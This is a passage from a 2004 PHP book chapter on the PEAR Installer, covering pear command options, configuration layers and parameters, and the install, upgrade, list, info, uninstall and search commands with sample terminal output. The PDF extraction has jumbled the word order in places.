    382 Gutmans_ch10 Page 354 Thursday, September 23, 2004 2:51 PM 354 Using PEAR Chap. 10 go-pear requests whether you want to install the For your convenience, PFC packages. Just install them (press Enter): Loading zlib: ok Downloading package: PEAR...ok Downloading package: Archive_Tar...ok Downloading package: Console_Getopt...ok Downloading package: XML_RPC...ok Bootstrapping: PEAR...(remote) ok Bootstrapping: Archive_Tar...(remote) ok Bootstrapping: Console_Getopt...(remote) ok Downloading package: DB...ok Downloading package: Net_Socket...ok Downloading package: Net_SMTP...ok Downloading package: Mail...ok Downloading package: XML_Parser...ok Downloading package: PHPUnit2...ok Extracting installer...ok install ok: PEAR 1.3.1 install ok: Archive_Tar 1.2 install ok: Console_Getopt 1.2 install ok: XML_RPC 1.1.0 install ok: DB 1.6.4 install ok: Net_Socket 1.0.2 install ok: Net_SMTP 1.2.6 install ok: Mail 1.1.3 install ok: XML_Parser 1.2.0 install ok: PHPUnit2 2.0.0beta2 The 'pear' command is now at your service at /usr/local/bin/pear Congratulations, you have just installed PEAR! NSTALLING P 10.4 I ACKAGES This section covers how to maintain your collection of installed packages. The following examples all assume that you have the PEAR Installer installed and configured. The PEAR Installer comes with different user interfaces, called front- ends . The default front-end that is installed by go-pear along with PHP is the command-line (CLI) front-end. You will see a presentation of two graphical front-ends too, one that is browser-based and one that is Gtk-based. 10.4.1 Using the Command pear pear command is the main installation tool for PEAR. It has several sub- The install and upgrade , and runs on all platforms PEAR sup- commands, such as ports: UNIX, Windows, and Darwin.

    383 Gutmans_ch10 Page 355 Thursday, September 23, 2004 2:51 PM 10.4 Installing Packages 355 help . sub- The first subcommand you should be familiar with is pear help command will display a short help text and lists all the command-line options for that subcommand. pear help displays a list of subcommands. This is what the output looks like: pear help $ Usage: pear [options] command [command-options] Type "pear help options" to list all options. Type "pear help " to get the help for the specified command. Commands: build Build an Extension From C Source bundle Unpacks a PECL package clear-cache Clear XML-RPC Cache config-get Show One Setting config-help Show Information About Setting config-set Change Setting config-show Show All Settings Run a "cvs diff" for all files in a package cvsdiff cvstag Set CVS Release Tag download Download Package download-all Downloads every package from {config master_server} info Display information about a package install Install Package list List Installed Packages list-all List All Packages list-upgrades List Available Upgrades login Connects and authenticates to remote server logout Logs out from the remote server makerpm Builds an RPM package from a PEAR package package Build Package package-dependencies Show package dependencies package-validate Validate Package Consistency remote-info Information About Remote Packages remote-list List Remote Packages run-tests Run Regression Tests search Search remote package database shell-test Shell Script Test sign Sign a package distribution file uninstall Un-install Package upgrade Upgrade Package upgrade-all Upgrade All Packages Command-line options (such as –n or --nodeps ) may be 10.4.1.1 Options pear specified to both the command itself, and to the subcommand. The syntax is like this: pear [options] sub-command [sub-command options] [sub-command arguments] ➥ pear To list the options for the [options] as shown ear- command itself ( lier), type pear help options :

    384 Gutmans_ch10 Page 356 Thursday, September 23, 2004 2:51 PM 356 Using PEAR Chap. 10 pear help options $ Options: -v increase verbosity level (default 1) -q be quiet, decrease verbosity level -c file find user configuration in ‘file' -C file find system configuration in ‘file' -d foo=bar set user config variable ‘foo' to ‘bar' -D foo=bar set system config variable ‘foo' to ‘bar' -G start in graphical (Gtk) mode -s store user configuration -S store system configuration -u foo unset ‘foo' in the user configuration -h, -? display help/usage (this message) -V version information All these options are optional and may always be specified regardless of what subcommand is used. Let’s go through them one by one. “V” is for “verbose.” This option increases the installer’s verbosity Option: -V level for this command. The verbosity level is stored in the verbose configura- –s tion parameter, so unless you specify the option, the verbosity is increased only for this execution. The PEAR Installer has four verbosity levels: 0 . Really silent. ☞ ☞ . Informational messages. 1 ☞ 2 . Trace messages. 3 ☞ . Debug output. Here’s an example: pear –v install Auth $ + tmp dir created at /tmp/tmpAR6ABu downloading Auth-1.1.1.tgz ... ...done: 11,005 bytes + tmp dir created at /tmp/tmp4BPB6x installed: /usr/share/pear/Auth/Auth.php installed: /usr/share/pear/Auth/Container.php + create dir /usr/share/pear/docs/Auth installed: /usr/share/pear/docs/Auth/README.Auth + create dir /usr/share/pear/Auth/Container installed: /usr/share/pear/Auth/Container/DB.php installed: /usr/share/pear/Auth/Container/File.php installed: /usr/share/pear/Auth/Container/LDAP.php install ok: Auth 1.1.1 This option may be repeated to increase the verbosity even more. “Q” is for “quiet.” This option is just like the Option: -q option except that –v reduces the verbosity level. it Option: -c / -C “C” is for “configuration file.” This option is used to specify user configuration layer. Configuration lay- the configuration file to use for the –C option ers are described in the “Configuration Parameters” section. The does the same thing for the system configuration layer.

    385 Gutmans_ch10 Page 357 Thursday, September 23, 2004 2:51 PM 10.4 Installing Packages 357 This option can be useful, for example, if you want to maintain a test area for PEAR packages by having separate directories for php_dir & company , option. and simply switching configurations by using the –c Here’s an example: $ pear –c ~/.pearrc.test list –s or –S options, the configuration will be saved to If combined with the the file specified with the option. –c or –C –d option sets a configuration para- “D” is for “define.” The Option: -d / -D meter for this command. This is a volatile configuration change; the change only applies to the current command. The –D variation does the same thing, except it changes the system configuration layer (more on layers in the next section). Here’s an example: $ pear –d http_proxy=proxy.example.com:3128 remote-list –s option, the configuration parameter Again, combined with the option is stored and becomes permanent, as will the –S changed with the –d option. option for configuration parameters changed with the –D Option: -G “G” is for “Gtk” or “graphical,” if you prefer. This option starts the PEAR Installer with the Gtk front-end. You need to have php-gtk and the packages installed. You can try that out later in this chapter. PEAR_Frontend_Gtk “S” is for “store configuration,” and causes the Option: -s / -S command pear –d option. The to store any volatile configuration changes you made with the uppercase and lowercase versions of this option have the same function but for different configuration layers. You learn about configuration layers in the next section; until then, keep in mind that the option is for the user layer, and –s option is for the system the All configuration changes are stored, includ- S layer. –v or –q option. ing verbosity level if you changed that with the “U” is for “unset.” This option is for removing the definition of a Option: -u user configuration parameter from the configuration layer. The purpose of this is to revert that parameter to the system-specified value easily. You do not have to worry about what the old value was, unless the system layer has changed in the meantime; it will still be there, and will be used when the user configuration is unset. By default, the effect of this option lasts only for one execution; combine it with the –s option to make it permanent. “H” is for “help.” It does the same thing as both Option: -h or just pear help pear . Option: -V “V” is for “version.” This option makes the pear command just dis- play version information and exit.

    386 Gutmans_ch10 Page 358 Thursday, September 23, 2004 2:51 PM 358 Using PEAR Chap. 10 10.5 C ONFIGURATION ARAMETERS P The different installer front-ends differ only in their user-interface specific parts; the core, executing part of each command, is shared between all front- ends. Their configuration parameters are also common; the documentation base directory used in the command-line installation is the same one used by the Gtk installer, and so on. The PEAR Installer has many configuration parameters, only some of which you need to worry about right now. Look at the PEAR main directory parameter and the other directory parameters first. Next is the complete list of configuration parameters in the PEAR pear Installer (see Table 10.4). This is close to what you see when running the command. config-show Table 10.4 PEAR Configuration Parameters Configuration Parameter Variable Name Example Value php_dir /usr/share/pear PEAR main directory bin_dir PEAR executables directory /usr/bin doc_dir PEAR documentation directory /usr/share/pear/docs ext_dir PHP extension directory /usr/lib/php/20010901 cache_dir /tmp/pear/cache PEAR Installer cache directory data_dir PEAR data directory /usr/share/pear/data test_dir PEAR test directory /usr/share/pear/tests cache_ttl Cache TimeToLive not set preferred_state Preferred Package State alpha umask UNIX file mask 022 verbose Debug Log Level 1 http_proxy HTTP Proxy Server Address not set master_server PEAR server pear.php.net password not set PEAR password (for maintainers) username PEAR user name (for maintainers) not set sig_type Package Signature Type gpg sig_bin Signature Handling Program /usr/bin/gpg sig_keydir Signature Key Directory /usr/etc/pearkeys sig_keyid Signature Key Id not set The various directory parameters are base directories for installation of different file types, such as PHP code, dynamically loadable extensions, docu- mentation, scripts, programs, and regression tests. Some of these were men- tioned in the previous go-pear section, but here is the full list:

    387 Gutmans_ch10 Page 359 Thursday, September 23, 2004 2:51 PM 10.5 Configuration Parameters 359 PEAR main directory (php_dir) . Directory where the PHP include ☞ files are stored, as well as PEAR’s internal administration files to keep track of installed packages. If you change this configuration parameter, the installer will no longer “find” the packages you installed there. This feature makes it possible to maintain several PEAR installations on the /usr/local/lib/ same machine. The default value for this parameter is . php ☞ PEAR executables directory (bin_dir) . Directory where, executable pear command itself scripts and programs are installed. For example, the . /usr/local/bin is installed here. The default value for this parameter is . Directory where docu- ☞ PEAR documentation directory (doc_dir) is a directory mentation files are installed. Directly beneath the doc_dir named after the package, containing all the documentation files installed /usr/local/lib/ with the package. The default value of this parameter is . php/docs . Directory where all PHP exten- ☞ PHP extension directory (ext_dir) sions that are built during install end up. Make sure you set to this directory in your php.ini file. The default value for extension_dir /usr/local/lib/php/extensions/ BUILDSPEC this parameter is BUILD- , where is comprised of Zend’s module API version and whether PHP was SPEC BUILD- built with ZTS (Zend thread safety) and debugging. For example, 20020429 for the API released April 29, 2002, without ZTS would be SPEC and debug. PEAR installer cache directory (cache_dir) ☞ . Directory where the installer may store caching data. This local caching is used to speed up repeated XML-RPC calls to the central server. PEAR data directory (data_dir) ☞ . Directory that stores files that are neither code, regression tests, executables, nor documentation. Typical candidates for “data files” are DTD files, XSL stylesheets, offline tem- plate files, and so on. ☞ . The number of seconds cached XML- Cache TimeToLive (cache_ttl) RPC calls should be stored before invalidated. Set this to a value larger than 0 to enable caching of XML-RPC method calls; this speeds up remote operations. Preferred Package Stage (preferred_state) . Parameter that enables ☞ you to set the quality you expect from a package release before you even see it. There are five states to choose from: stable (production code), beta, alpha, snapshot, and devel. The installer perceives the quality of a release as highest with “stable” and lowest with “devel,” and shows you releases of the preferred state or better . This means that if you set your preferred state to “stable,” you only see stable releases when browsing the package database. However, if you set preferred state to “alpha,” you see alpha as well as beta and stable-state releases.

    388 Gutmans_ch10 Page 360 Thursday, September 23, 2004 2:51 PM 360 Using PEAR Chap. 10 Unix file mask (umask) . Parameter used to determine the default file ☞ tells which umask permissions for new files on UNIX-style systems. The away file permission bits will be masked . ☞ . The default debug log level that says how Debug Log Level (verbose) many -v command-line options are used by default. The recommended value is 1, which is informational. A value of 2 shows some details about what the installer is doing. A value of 3 or greater is for debugging the installer. HTTP Proxy Server (http_proxy) . You can set this configuration ☞ parameter to make the PEAR Installer always use a web proxy. You spec- ify the proxy as http:// host:port . If your proxy requires host:port or http:// . authorization, specify it as user:pw@host:port . The hostname of the package registry PEAR Server (master_server) ☞ server. Registry queries and downloads are all proxied through this server. ☞ PEAR username / PEAR password (username / password) . For commands that require authorization, you must log in first with the command. When you log in, your username and password are login stored in these two configuration parameters (maintainers only). ☞ . What type of signature tool to use when Signature Type (sig_type) adding signing packages (maintainers only). ☞ Signature Handling Program (sig_bin) . The path of the executable used to handle signatures (maintainers only). Signature Key Directory (sig_keydir) . The directory where PHP/ ☞ PEAR-specific public and private keys are stored (maintainers only). Signature Key Id (sig_keyid) . The key id that is used when signing ☞ packages. If this configuration parameter is not set, the default is left to the Signature Handling Program (maintainers only). Each configuration parameter may be defined in Configuration Layers layers : a user’s private configuration file (the user three locations, called ), the system-wide configuration file (the layer ), and built-in layer system default defaults (the layer ). When you run the installer and it needs to look up some configuration parameter, it will check the user layer first. If the parame- ter is not user-defined, it checks the system layer. If it was not found in the system configuration either, the default layer is used. The default layer has a built-in default value for every configuration parameter.

    389 Gutmans_ch10 Page 361 Thursday, September 23, 2004 2:51 PM 10.5 Configuration Parameters 361 pear config- To see the value of a single configuration parameter, use the get command. Here is the built-in help text and some usage examples: $ pear help config-get pear config-get [layer] Displays the value of one configuration parameter. The first argument is the name of the parameter, an otional second argument may be used to tell which configuration layer to look in. Valid configuration layers are "user", "system" and "default". If no layer is specified, a value will be picked from the first layer that defines the parameter, in the order just specified. pear help output, it’s useful to know (When reading the first line of the means that foo is a required argument, while that means bar is [bar] optional.) So, with config-get you may specify the layer. If you don’t, it will pick the value from the highest-precedence layer that defines it. Now, for some examples: $ pear config-get verbose verbose=1 pear config-get verbose user $ user.verbose=1 $ pear config-get verbose system system.verbose= $ pear config-get verbose default default.verbose=1 verbose configuration parameter is set both in the As you can see, the user and default layer. That means it is the user-specified parameter that takes effect. It is possible to clear a user- or system-specified value with the -u option to the installer: pear –u verbose -s $ $ pear config-get verbose verbose=1 $ pear config-get verbose user user.verbose= pear config-get verbose system $ system.verbose= $ pear config-get verbose default default.verbose=1 Changing the Configuration To change a configuration parameter, you can use either or pear –d . Here’s the help text for config-set : pear config-set

    390 Gutmans_ch10 Page 362 Thursday, September 23, 2004 2:51 PM 362 Using PEAR Chap. 10 pear help config-set $ pear config-set [layer] Sets the value of one configuration parameter. The first argument is the name of the parameter, the second argument is the new value. Some parameters are subject to validation, and the command will fail with an error message if the new value does not make sense. An optional third argument may be used to specify which layer to set the configuration parameter in. The default layer is "user". Actually, this command pear config-set foo bar $ is equivalent to $ pear –d foo=bar -s pear –d is that the effect of and pear config-set The difference between config-set applies only applies permanently from the next command, while –d to the current command. Tip: If you want to have parallel PEAR installations, (for instance, one in which to test-install your own packages), define a shell alias to something like , and set the different directory parameters in this con- pear –c test-pear.conf figuration only. Before you change everything, you should be aware that the PEAR main directory ) has a special function. The list of configuration parameter ( php_dir .registry . If installed packages database lives there in a subdirectory called php_dir , you will not see the packages installed in the old php_dir you change anymore. Here’s an example: $ pear config-get php_dir php_dir=/usr/local/lib/php $ pear list Installed packages: =============== Version State Package Archive_Tar 0.9 stable Console_Getopt 1.0 stable DB 1.3 stable 1.0.1 stable Mail Net_SMTP 1.0 stable 1.0.1 Net_Socket stable PEAR stable 1.0b2 1.0 XML_Parser stable XML_RPC 1.0.4 stable So, PEAR PHP files are installed in /usr/local/lib/php, and you have just go-pear the core packages provided by the php_dir : install. Now, try changing $ pear config-set php_dir /usr/share/pear $ pear list (no packages installed)

    391 Gutmans_ch10 Page 363 Thursday, September 23, 2004 2:51 PM 10.5 Configuration Parameters 363 There’s no reason to panic—your packages are still in /usr/local/lib/php, but the installer doesn’t see them now. How do you get the old php_dir setting command, the back? In addition to the pear pear config-set command has some options where you can set individual configuration parameters only for one run, permanently, or unset a parameter in a specific layer. You may return to the old setting by setting it explicitly like this: $ pear config-set php_dir /usr/local/lib/php But to demonstrate the flexibility of configuration layers, you can simply unset php_dir from the user configuration layer instead: $ pear –u php_dir –s $ pear list Installed packages: =============== Package Version State stable Archive_Tar 0.9 Console_Getopt 1.0 stable DB stable 1.3 Mail 1.0.1 stable Net_SMTP 1.0 stable 1.0.1 stable Net_Socket PEAR 1.0b2 stable 1.0 stable XML_Parser 1.0.4 stable XML_RPC -u php_dir option makes pear delete Your packages are back! The php_dir option makes configuration -s from the (u)ser layer for this run, while the php_dir to the changes to the user layer permanent. Effectively, this reverts value it has in the “system” layer. If you would just like to set a configuration value for a single run of the pear command, here is how: $ pear –d preferred_state=alpha remote-lis t preferred_state configuration parameter to alpha This sets the (in the user layer, if you care to know) for this command. What this command does is show you package and releases of stable, beta, and alpha quality from pear.php.net . By default, you will only see stable releases. There are three places where each configuration parameter may be defined. First, the installer looks at the user’s local configuration (~/.pearrc on pear.ini in the System directory on Windows). If the requested para- UNIX, meter was found in the user configuration, that value is returned. If not, the installer proceeds to the system-wide configuration file ( /etc/pear.conf on UNIX, pearsys.ini in the System directory on Windows). If that fails as well, a default built-in value is used.

    392 Gutmans_ch10 Page 364 Thursday, September 23, 2004 2:51 PM 364 Using PEAR Chap. 10 php_dir preferred_state For the two example settings in Table 10.5, and , PEAR looks for a value starting on the first row (the user layer) going down setting resolves to php_dir /usr/local/ until a value exists. In this example, the setting resolves to lib/php , , which is the default. The preferred_state beta because this is the value set in the user layer. Table 10.5 setting preferred_state setting php_dir Config Layer beta (not set) User System (not set) (not set) /usr/local/lib/php Default stable The content of the configuration files is serialized PHP data, which is not for the faint of heart to read or edit. If you edit it directly and make a mistake, pear you lose the entire layer upon saving it again, so stick to the command. 10.6 PEAR C OMMANDS In this section, you learn all the PEAR Installer commands for installation and maintenance of packages on your system. For each of the commands, you pear help , and a thorough explanation of every command will have the output of option the command offers. If you notice commands mentioned in some of the help text that you do not find covered here, those commands are used by PEAR package maintaners during development. The development commands are covered in Chapter 12. 10.6.1 pear install This command takes the content of a package file and installs files in your des- ignated PEAR directories. You may specify the package to install as a local file, just the package name or as a full HTTP URL. Here’s the help text for pear install : $ pear help install ➥ pear install [options] ... Installs one or more PEAR packages. You can specify a package to install in four ways: "Package-1.0.tgz" : installs from a local file "http://example.com/Package-1.0.tgz" : installs from anywhere on the net. "package.xml" : installs the package described in package.xml. Useful for testing, or for wrapping a PEAR package in another package manager such as RPM.

    393 Gutmans_ch10 Page 365 Thursday, September 23, 2004 2:51 PM 10.6 PEAR Commands 365 "Package" : queries your configured server (pear.php.net) and downloads the newest package with the preferred quality/state (stable). More than one package may be specified at once. It is ok to mix these four ways of specifying packages. ➥ Options: -f, --force will overwrite newer installed packages The option lets you install the package even if the same release or -force a newer release is already installed. This is useful for repairing broken installs, or during testing. -n, --nodeps ignore dependencies, install anyway Use this option to ignore dependencies and pretend that they are already installed. Use it only if you understand the consequences, the installed pack- age may not work at all. -r, --register-only do not install files, only register the package as installed The -register-only option makes the installer list your package as installed, but it does not actually install any files. The purpose of this is to make it possible for non-PEAR package managers to also register packages as installed in the PEAR package registry. For example, if you install DB (the PEAR database layer) with an RPM, all the files are installed and you can use pear list command does not show that it is installed because RPM it, but the does not (by default) update the PEAR package registry. But, if the RPM pack- age has a command that runs pear -register-only package.xm , the post-install package will be registered, both from RPM’s and PEAR’s point of view. -s, --soft soft install, fail silently, or upgrade if already installed This option is another way of saying, “Please give me the latest version of this package.” If the package is not installed already, it will be installed. If the package is installed but you are specifying a package tarball with a newer package, or the latest online version is newer, the package will be upgraded. pear install -s and pear upgrade is that upgrade The difference between upgrades only if the package is already installed. -B, --nobuild don't build C extensions If you are installing a package that is a mix of PHP and C code and don’t want to build and install the C code, or you simply want to test-install a pack- age with C code, use . -nobuild -Z, --nocompress request uncompressed files when downloading

    394 Gutmans_ch10 Page 366 Thursday, September 23, 2004 2:51 PM 366 Using PEAR Chap. 10 If your PHP build does not include the zlib extension, PHP cannot uncompress gzipped package files. The installer detects this automatically, and will download non-gzipped packages when necessary. But, if this detection -nocompres doesn’t work, you can override it with the option. -R DIR, --installroot=DIR root directory used when installing files (ala PHP's INSTALL_ROOT) This option is useful when you are installing PEAR packages from a script or using another package manager. All file names created by the installer will have prepended. DIR --ignore-errors force install even if there were errors If there are errors in a package and the installer refuses to go ahead and option to force installation. There is a install it, you can use the ignore-errors risk of an inconsistent install when using this option, so use it with care! -a, --alldeps install all required and optional dependencies Use this option to automatically download and install any dependencies. -o, --onlyreqdeps install all required dependencies Some packages have , which means a depen- optional dependencies dency that exists to use optional features of the package. If you want to satisfy all the dependencies, but don’t need the optional features, use this option. Here are some examples of typical use. First, a plain example installing a package with no dependencies: $ pear install Console_Table downloading Console_Table-1.0.1.tgz ... Starting to download Console_Table-1.0.1.tgz (3,319 bytes) ...done: 3,319 bytes install ok: Console_Table 1.0.1 Here is an example of installing a package with many optional dependen- cies, but pulling only the packages that are required: pear install –o HTML_QuickForm $ downloading HTML_Progress-1.1.tgz ... Starting to download HTML_Progress-1.1.tgz (163,298 bytes) ...done: 163,298 bytes skipping Package 'html_progress' optional dependency 'HTML_CSS' skipping Package 'html_progress' optional dependency 'HTML_Page' skipping Package 'html_progress' optional dependency 'HTML_QuickForm' skipping Package 'html_progress' optional dependency 'HTML_QuickForm_Controller'skipping Package 'html_progress' optional dependency 'Config' downloading HTML_Common-1.2.1.tgz ... Starting to download HTML_Common-1.2.1.tgz (3,637 bytes) ...done: 3,637 bytes

    395 Gutmans_ch10 Page 367 Thursday, September 23, 2004 2:51 PM 10.6 PEAR Commands 367 install ok: HTML_Common 1.2.1 Optional dependencies: package 'HTML_CSS' version >= 0.3.1 is recommended to utilize some features. package 'HTML_Page' version >= 2.0.0RC2 is recommended to utilize some features.package ‘HTML_QuickForm' version >= 3.1.1 is recommended to utilize some features. package 'HTML_QuickForm_Controller' version >= 0.9.3 is recommended to utilize some features. package 'Config' version >= 1.9 is recommended to utilize some features. install ok: HTML_Progress 1.1 Finally, this example installs a package and all dependencies, looking for releases of beta or better quality: $ pear –d preferred_state=beta install –a Services_Weather downloading Services_Weather-1.2.2.tgz ... Starting to download Services_Weather-1.2.2.tgz (29,205 bytes) ...done: 29,205 bytes downloading Cache-1.5.4.tgz ... Starting to download Cache-1.5.4.tgz (30,690 bytes) ...done: 30,690 bytes downloading HTTP_Request-1.2.1.tgz ... Starting to download HTTP_Request-1.2.1.tgz (12,021 bytes) ...done: 12,021 bytes downloading SOAP-0.8RC3.tgz ... Starting to download SOAP-0.8RC3.tgz (67,608 bytes) ...done: 67,608 bytes downloading XML_Serializer-0.9.2.tgz ... Starting to download XML_Serializer-0.9.2.tgz (12,340 bytes) ...done: 12,340 bytes downloading Net_URL-1.0.11.tgz ... Starting to download Net_URL-1.0.11.tgz (4,474 bytes) ...done: 4,474 bytes downloading Mail_Mime-1.2.1.tgz ... Starting to download Mail_Mime-1.2.1.tgz (15,268 bytes) ...done: 15,268 bytes downloading Net_DIME-0.3.tgz ... Starting to download Net_DIME-0.3.tgz (6,740 bytes) ...done: 6,740 bytes downloading XML_Util-0.5.2.tgz ... Starting to download XML_Util-0.5.2.tgz (6,540 bytes) ...done: 6,540 bytes install ok: Mail_Mime 1.2.1 install ok: Net_DIME 0.3 install ok: XML_Util 0.5.2 install ok: Net_URL 1.0.11 install ok: XML_Serializer 0.9.2 install ok: HTTP_Request 1.2.1 install ok: Cache 1.5.4 install ok: SOAP 0.8RC3 install ok: Services_Weather 1.2.2

    396 Gutmans_ch10 Page 368 Thursday, September 23, 2004 2:51 PM 368 Using PEAR Chap. 10 pear list 10.6.2 command lists the contents of either your package registry or a The pear list single package. First, let’s list the currently installed packages to see how the package is doing: Date INSTALLED PACKAGES: =================== PACKAGE VERSION STATE Archive_Tar 1.1 stable Cache 1.4 stable Console_Getopt 1.2 stable Console_Table 1.0.1 stable DB 1.6.3 stable Date 1.4.2 stable HTTP_Request 1.2.1 stable Log 1.2 stable Mail 1.1.2 stable Mail_Mime 1.2.1 stable Net_DIME 0.3 beta Net_SMTP 1.2.6 stable Net_Socket 1.0.2 stable Net_URL 1.0.11 stable PEAR 1.3.1 stable PHPUnit2 2.0.0beta1 beta SOAP 0.8RC3 beta XML_Parser 1.1.0 stable XML_RPC 1.1.0 stable XML_Serializer 0.9.2 beta XML_Util 0.5.2 stable To inspect the contents of the recently installed package, use the Date command: list $ pear list Net_Socket INSTALLED FILES FOR NET_SOCKET ============================== TYPE INSTALL PATH php /usr/local/lib/php/Net/Socket.php This package contains only files. The PEAR package contains different php types of files. The following example also illustrates how “data” files are installed with the package name as part of the file path: $ pear list PEAR INSTALLED FILES FOR PEAR ======================== TYPE INSTALL PATH data /usr/local/lib/php/data/PEAR/package.dtd data /usr/local/lib/php/data/PEAR/template.spec php /usr/local/lib/php/PEAR.php php /usr/local/lib/php/System.php php /usr/local/lib/php/PEAR/Autoloader.php php /usr/local/lib/php/PEAR/Command.php php /usr/local/lib/php/PEAR/Command/Auth.php php /usr/local/lib/php/PEAR/Command/Build.php php /usr/local/lib/php/PEAR/Command/Common.php

    397 Gutmans_ch10 Page 369 Thursday, September 23, 2004 2:51 PM 10.6 PEAR Commands 369 php /usr/local/lib/php/PEAR/Command/Config.php php /usr/local/lib/php/PEAR/Command/Install.php php /usr/local/lib/php/PEAR/Command/Package.php php /usr/local/lib/php/PEAR/Command/Registry.php php /usr/local/lib/php/PEAR/Command/Remote.php php /usr/local/lib/php/PEAR/Command/Mirror.php php /usr/local/lib/php/PEAR/Common.php php /usr/local/lib/php/PEAR/Config.php php /usr/local/lib/php/PEAR/Dependency.php php /usr/local/lib/php/PEAR/Downloader.php php /usr/local/lib/php/PEAR/ErrorStack.php php /usr/local/lib/php/PEAR/Frontend/CLI.php php /usr/local/lib/php/PEAR/Builder.php php /usr/local/lib/php/PEAR/Installer.php php /usr/local/lib/php/PEAR/Packager.php php /usr/local/lib/php/PEAR/Registry.php php /usr/local/lib/php/PEAR/Remote.php php /usr/local/lib/php/OS/Guess.php script /usr/local/bin/pear php /usr/local/lib/php/pearcmd.php pear info 10.6.3 The command displays information about an installed package, a pear info package tarball, or a package definition (XML) file. This example shows the information about the XML-RPC package: $ pear info XML_RPC About XML_RPC-1.1.0 =================== Provides Classes: Package XML_RPC Summary PHP implementation of the XML-RPC protocol Description This is a PEAR-ified version of Useful inc's XML-RPC for PHP. It has support for HTTP transport, proxies and authentication. Maintainers Stig S?ther Bakken (lead) Version 1.1.0 Release Date 2003-03-15 Release License PHP License Release State stable Release Notes - Added support for sequential arrays to XML_RPC_encode() (mroch) - Cleaned up new XML_RPC_encode() changes a bit (mroch, pierre) - Remove "require_once 'PEAR.php'", include only when needed to raise an error - Replace echo and error_log() with raiseError() (mroch) - Make all classes extend XML_RPC_Base, which will handle common functions (mroch) - be tolerant of junk after methodResponse (Luca Mariano, mroch)

    398 Gutmans_ch10 Page 370 Thursday, September 23, 2004 2:51 PM 370 Using PEAR Chap. 10 - Silent notice even in the error log (pierre) - fix include of shared xml extension on win32 (pierre) Last Modified 2004-05-03 pear If you have downloaded a package file (.tgz file), you may also run on it to display information about the contents without installing the pack- info age first; for example: $ pear info XML-RPC-1.1.0.tgz You can even specify a full URL to a package you want to view: pear info http://www.example.com/packages/Foo_Bar-4.2.tgz $ command. See also the remote-info 10.6.4 pear list-all displays all the packages installed on your system, pear list- While pear list displays an alphabetically sorted list of packages with the latest stable all all version, and which version you have installed, if any. The full output of this command is long because it lists every package that has a stable release. ALL PACKAGES: ============= PACKAGE LATEST LOCAL APC 2.0.3 Cache 1.5.4 1.4 Cache_Lite 1.3 apd 0.4p2 ...truncated... XML_Transformer 1.0.1 XML_Tree 1.1 XML_Util 0.5.2 0.5.2 PHPUnit2 2.0.0beta1 Net_DIME 0.3 XML_Serializer 0.9.2 SOAP 0.8RC3 10.6.5 pear list-upgrades pear list-upgrades command compares the version you have installed con- The taining the newest version with the release state you have configured (see the parameter). Here’s an example: preferred_state configuration pear list-upgrades $ AVAILABLE UPGRADES (STABLE): ============================ PACKAGE LOCAL REMOTE SIZE Cache 1.4 (stable) 1.5.4 (stable) 30kB DB 1.6.3 (stable) 1.6.4 (stable) 90kB Log 1.2 (stable) 1.8.4 (stable) 29kB Mail 1.1.2 (stable) 1.1.3 (stable) 13.2kB

    399 Gutmans_ch10 Page 371 Thursday, September 23, 2004 2:51 PM 10.6 PEAR Commands 371 The version listed here is not the one you have installed, but the one you will upgrade to if you use the upgrade command. pear upgrade 10.6.6 The command replaces one or more installed packages with a pear upgrade newer release, if a newer release can be found. As with many other commands taking a package argument, you may refer to the package just by name, the URL or name of a tarball, or the URL or name of a package description (XML) file. This section only demonstrates specifying the package by name because that is by far the most common usage. example, you saw a few packages where newer In the list-upgrades package: Log releases were available. Upgrade the $ pear upgrade Log downloading Log-1.8.4.tgz ... Starting to download Log-1.8.4.tgz (29,453 bytes) ...done: 29,453 bytes Optional dependencies: 'sqlite' PHP extension is recommended to utilize some features upgrade ok: Log 1.8.4 upgrade command has the same options as the install command, The with the exception that the –S / --soft option is missing. The options are install command, shown previously, for a more listed here; refer to the detailed description. pear help upgrade $ pear upgrade [options] ... Upgrades one or more PEAR packages. See documentation for the "install" command for ways to specify a package. When upgrading, your package will be updated if the provided new package has a higher version number (use the -f option if you need to upgrade anyway). More than one package may be specified at once. Options: -f, --force overwrite newer installed packages -n, --nodeps ignore dependencies, upgrade anyway -r, --register-only do not install files, only register the package as upgraded -B, --nobuild don't build C extensions -Z, --nocompress request uncompressed files when downloading -R DIR, --installroot=DIR root directory used when installing files (ala PHP's ➥ INSTALL_ROOT) --ignore-errors force install even if there were errors

    400 Gutmans_ch10 Page 372 Thursday, September 23, 2004 2:51 PM 372 Using PEAR Chap. 10 -a, --alldeps install all required and optional dependencies -o, --onlyreqdeps install all required dependencies pear upgrade-all 10.6.7 upgrade-all command provides a combination of the For your convenience, the list-upgrades and upgrade commands, upgrading every package that has a newer release available. The command-line options available are -n, --nodeps ignore dependencies, upgrade anyway -r, --register-only do not install files, only register the package as upgraded -B, --nobuild don't build C extensions -Z, --nocompress request uncompressed files when downloading -R DIR, --installroot=DIR root directory used when installing files (ala PHP's ➥ INSTALL_ROOT) --ignore-errors force install even if there were errors install See the command for a description of each of these options. If you have followed the examples in this chapter, you have still not upgraded three out of the four packages that list-upgrades reported as having newer releases. Upgrade them all at once like this: pear upgrade-all $ Will upgrade cache Will upgrade db Will upgrade mail downloading Cache-1.5.4.tgz ... Starting to download Cache-1.5.4.tgz (30,690 bytes) ...done: 30,690 bytes downloading DB-1.6.4.tgz ... Starting to download DB-1.6.4.tgz (91,722 bytes) ...done: 91,722 bytes downloading Mail-1.1.3.tgz ... Starting to download Mail-1.1.3.tgz (13,415 bytes) ...done: 13,415 bytes upgrade-all ok: Mail 1.1.3 upgrade-all ok: DB 1.6.4 upgrade-all ok: Cache 1.5.4 Optional dependencies: 'sqlite' PHP extension is recommended to utilize some features upgrade-all ok: Log 1.8.4

    401 Gutmans_ch10 Page 373 Thursday, September 23, 2004 2:51 PM 10.6 PEAR Commands 373 pear uninstall 10.6.8 To delete a package, you must uninstall it. Here’s an example: pear uninstall Cache $ Warning: Package 'services_weather' optionally depends on 'Cache' uninstall ok: Cache command has three options: The uninstall pear uninstall [options] ... Uninstalls one or more PEAR packages. More than one package may be specified at once. Options: -n, --nodeps ignore dependencies, uninstall anyway -r, --register-only do not remove files, only register the packages as not installed -R DIR, --installroot=DIR root directory used when installing files (ala PHP's INSTALL_ROOT) --ignore-errors force install even if there were errors These options all correspond to the same options to the install command. 10.6.9 pear search If you want to install a package but don’t remember what it was called, or just wonder if there is a package that does X, you can search for it with the pear search command, which does a substring search in package names. Here’s an example: $ pear search xml MATCHED PACKAGES: ================= PACKAGE LATEST LOCAL XML_Beautifier 1.1 Class to format XML documents. XML_CSSML 1.1 The PEAR::XML_CSSML package provides methods for creating cascading style ➥ ➥ sheets (CSS) from an XML standard 